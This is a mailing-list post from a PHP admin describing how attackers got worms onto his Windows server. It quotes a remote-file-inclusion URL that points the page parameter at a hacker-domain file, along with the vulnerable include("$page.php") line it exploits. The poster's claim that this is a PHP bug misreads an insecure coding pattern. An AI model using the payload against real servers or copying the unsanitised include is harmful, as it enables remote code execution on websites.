Re: Question on virus/worms

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen
> into Google and got a wealth of information.
    Yes, of course!  But what I can see there aren't far from useless
(cf what I write below).

Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]
    I know these already.  The server is using McAfee.  So I'm quite
familiar with VIL of McAfee.  But informations given by these pages
aren't enough to let me know what to do and how those virus/worms got to
get inside.
>>     Do they mean anything to anyone of you?  Do you know how they've got
>> inside the computer?  Is there anything to do to prevent that?  Are they
>> known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written
> scripts, over-reliance on scripts downloaded from the web and poor
> server security.
>
> Hope that helps.
    No, not really :-(

    But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.

    Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?

    And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");

    This is enough to make infiltration possible!  IMO, this instruction
is supposed to be used like this, isn't it?  So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a totally rewrite!  And there's no "poor server
security" that I can see.

    I've installed PHP5 and the problem seems fixed.  However, PHP
writes out where the problem occurs!  Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in
C:\Inetpub\wwwroot\index.php on line X

    I don't want them (the hackers) to be able to read this either. 
That gives too much information about my server's file system.  How can
I stop that?

    By the way, I know there're still a lot of servers out there still
using PHP4.  Is this vulnerability a known bug?  At least, I'm not aware
of that before!

    Regards,

    Seak




----------
* Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! www.zoner.com/zps
  You can download your free version.

-- 
PHP Windows Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [PHP Users]     [PHP Database Programming]     [PHP Install]     [Kernel Newbies]     [Yosemite Forum]     [PHP Books]
  Powered by Linux